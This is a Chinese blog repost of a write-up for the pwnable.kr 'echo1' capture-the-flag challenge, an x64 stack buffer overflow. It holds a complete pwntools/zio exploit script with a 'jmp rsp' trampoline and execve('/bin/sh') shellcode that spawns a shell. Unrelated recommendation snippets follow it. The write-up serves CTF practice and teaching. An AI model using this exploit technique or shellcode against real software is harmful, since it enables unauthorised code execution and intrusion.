echo1(Pwnable.kr)

最新推荐文章于 2022-06-11 13:09:44 发布
最新推荐文章于 2022-06-11 13:09:44 发布
阅读量121 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/anewid/p/4574186.html
版权

0x0 写在前面的话

这是一个典型的栈溢出漏洞,而且运行平台为x64。同样,我也遇到了问题,没能解决,在此还是谢谢龙龙大神。溢出点找到了,由于之前做Linux溢出一直是在导入表中找函数system的地址,然后覆盖掉其它函数进行调用。在Windows平台下做过直接在栈中调用shellcode的,在Linux平台下,第一次遇到,思路不够开阔,没想到,惭愧。

0x1 简单分析

132139519102096.jpg

0x2 溢出脚本

脚本中使用了ziopwntools

from zio import *
from pwn import asm,disasm

def exp():
    #io = zio(('pwnable.kr', 9010))
    io = zio('./echo1', timeout = 99999)
    raw_input()

    io.read_until(':')
    jmpesp=asm("jmp rsp", arch = 'amd64', os = 'linux')

    shell =asm(
        """
        xor    rdx, rdx
        mov  rbx,0x68732f6e69622f2f
        shr    rbx,8
        push   rbx
        mov    rdi,rsp
        push   rax
        push   rdi
        mov    rsi,rsp
        mov   al,0x3b
        syscall
        mov rdi,0
        mov al, 0x3c
        syscall
        """, arch = 'amd64', os = 'linux')

    ret_addr = 0x6020A0
    payload = 'a'*0x28+l64(ret_addr)+shell   #aaaa' + l32(call_system) + l32(input_addr)

    io.writeline(jmpesp)
    io.read_until('>')
    io.writeline('1')
    io.writeline(payload)
    io.interact()

exp()

0x3 感谢

这次又得到了龙龙大神的帮助,脚本由龙龙大神提供。

0x4 参考链接

http://blog.csdn.net/raintungli/article/details/43865041
https://www.exploit-db.com/shellcode/

转载于:https://www.cnblogs.com/anewid/p/4574186.html

weixin_30716725
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwnable.krecho1
子曰小玖的博客
06-10 515
https://r00tnb.github.io/2018/03/06/pwnable.kr-echo1/ 前言 简单的栈溢出题目。 分析 先分析反编译的代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ...
pwnable.kr echo1
you_need_me的博客
06-10 406
int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int *v3; // rsi _QWORD *v4; // rax unsigned int v6; // [rsp+Ch] [rbp-24h] __int64 v7; // [rsp+10h] [rbp-20h] __int...
pwnable.krecho1
Bill
05-30 747
缓冲区溢出新解题目链接:http://pwnable.kr/play.php 分析:该程序是一个64位的elf文件,运行程序.输入name,选择选项.hey, what's your name? : bill - select echo type - - 1. : BOF echo - 2. : FSB echo - 3. : UAF echo - 4. : exit大致流程就这样.看到有三个选项
pwnable echo1
weixin_30458043的博客
11-03 81
最近忙的好久没有更新了,有空把之前拿来练手的CTF pwn题逐渐整理一下放出来 题目是 linux 64位程序 ,流程很简单,大致思路就是先把一个跳转的机器指令写进name的地址,然后溢出覆盖eip,找一个通用的shellcode就行 转载于:https://www.cnblogs.com/bongbongbong/p/4934624.html...
echo 1 > /proc/sys/vm/block_dump
wmzjzwlzs的专栏
03-18 374
+++ b/kernel/linux-5.4/block/blk-core.c @@ -1178,6 +1178,7 @@ blk_qc_t submit_bio(struct bio *bio) op_is_write(bio_op(bio)) ? "WRITE" : "READ", (unsigned long long)bio->bi_iter.bi_sector, .
apachecn#apachecn-ctf-wiki#PWN-dragon-echo1-echo2-[pwnable.kr]CT
07-25
1. malloc person 2. malloc dragon 3. free dragon
echo_1.7.3.js.rar
06-05
echo是一个独立的JavaScript(不依靠jQuery)、轻量级的、延迟图片加载插件,echo压缩后体积不到1k,使用html的标准data-*属性,echo支持IE8+。http://www.yeedoo.net/programming/59.html
echo声卡驱动.rar
05-01
这是echofire 12 进12出,官方原版声卡驱动,解压安装即可,可设机架宿主混音编曲等,这是echofire 12 进12出,官方原版声卡驱动,解压安装即可,可设机架宿主混音编曲等这是echofire 12 进12出,官方原版声卡驱动,...
echonest.rar
09-18
《音乐音频 | 语音识别与音乐流派分类》博客配套资源 包含两个文件: fma-rock-vs-hiphop.csv echonest-metrics.json
echo银行系统.py
最新发布
10-17
echo银行系统.py
Linux 命令篇 之 echo(1)
weixin_38452632的博客
10-15 5382
  我在学linux时候老师叫我们打印个hello world出来,我写了个c文件printf(“hello world”);黑人疑问?很无奈…….后面 老师教了用echo写 1.  显示普通字符串,显示转义字符  2.显示变量 这就很像c语言的scanf和printf了  换行与不换行  显示结果到定向文件:在桌面生成了一个aa的文件夹  有关单,双引号的用...
释放linux缓存 echo 1 > /proc/sys/vm/drop_caches
lk的博客
06-11 5895
购买的云主机(1核2G,Debian系统)安装了docker。docker中运行着六七个服务(包括几个微服务项目和mysql,redis,nginx等),之前启动一直好好的,偶尔一天,不知什么原因,系统需要重启,当我手动启动docker的时候,几秒钟的时间内存和cpu立马撑爆了,并且服务器处于假死或者说宕机状态。也无法登录,连云厂商的后台监控都丢失了cpu和内存的监控数据。服务器重启之后,正常,但是只要一启动docker就再次假死,怎么回事?之前一直好好的呀 进过多次重启尝试无果后,仔细查看了一下内存 发现
配置Linux系统的ip转发功能
a1809032425的博客
07-29 1708
echo "1" > /proc/sys/net/ipv4/ip_forward 出于安全考虑,Linux系统默认是禁止数据包转发的。所谓转发即当主机拥有多于一块的网卡时,其中一块收到数据包,根据数据包的目的ip地址将包发往本机另一网卡,该网卡根据路由表继续发送数据包。这通常就是路由器所要实现的功能。 配置Linux系统的ip转发功能,首先保证硬件连通,然后打开系统的转发功能 less /proc/sys/net/ipv4/ip_forward,该文件内容为0,表示禁止数据包转发,1表示允许,将
PWN学习之[Rookiss]-[echo1]
Magic1an的博客
08-19 1541
echo1是一个64位的elf可执行文件,用checksec检查发现基本没有进行保护措施Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: H
pwnable(echo1)【栈溢出shellcode模板】
九层台
01-25 682
这个题目可以作为一个栈溢出使用shellcode的模板,它除了给出栈溢出,关闭了NX和canary保护其他的什么都没有给。 这里的溢出,看一下它的上一级 输入1会执行它。 我的想法是没有地址我就找rop来泄露libc,或者栈的地址 但是看了一下没有能用的rop 换个思路,导入shellcode,用jmp esp指令作为跳转(这个可以作为导入shellcode的一种通用思路)。 查了一下en...
Am335x 之GPIO控制
技术在变,人必须跟着变
11-15 9913
转载请注明原处,谢谢。QQ:343556608  参考:http://processors.wiki.ti.com/index.php/GPIO_Driver_Guide  目前还没有涉及到代码(后续会有新的博客更新),仅关注到用户空间对GPIO的控制。  1.执行下面的命令,可以显示目前驱动已经申请到的IO状态  $ mount -t debugfs debugfs /sys/kerne
Linux命令- echo、grep 、重定向、1>&2、2>&1的介绍
weixin_30532837的博客
08-05 1161
最近笔试遇到一道题,关于Linux命令的,题目如下 下面两条命令分别会有怎样的输出 echo hello 1>&2 |grep aaa echo hello 2>&1 |grep aaa A、两个均输出hello B、第一个无输出,第二个输出 hello C、第一个输出hello,第二个无输出 D、两个均输出hello 思考了几分钟,选了...
echo命令详解
复兴之路
09-01 6744
linux的echo命令, 在shell编程中极为常用, 在终端下打印变量value的时候也是常常用到的, 因此有必要了解下echo的用法 echo命令的功能是在显示器上显示一段文字,一般起到一个提示的作用。 该命令的一般格式为: echo [ -n ] 字符串 其中选
pwnable.kr学习pwn系列(2)
NoOneGroup
07-24 1335
博客已经转移 https://noone-hub.github.io/ 由上一节教会的动作,我就不提了,直接贴上代码 #include <stdio.h> #include <string.h> unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int...
echo "clean..."
07-22
这个命令 `echo "clean..."` 是用于在终端输出字符串 "clean..."。在Shell脚本中,`echo` 命令被用来显示文本或变量的值。它的基本语法是: ``` echo [OPTIONS] [STRING] ``` 其中,`OPTIONS` 是可选的参数,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值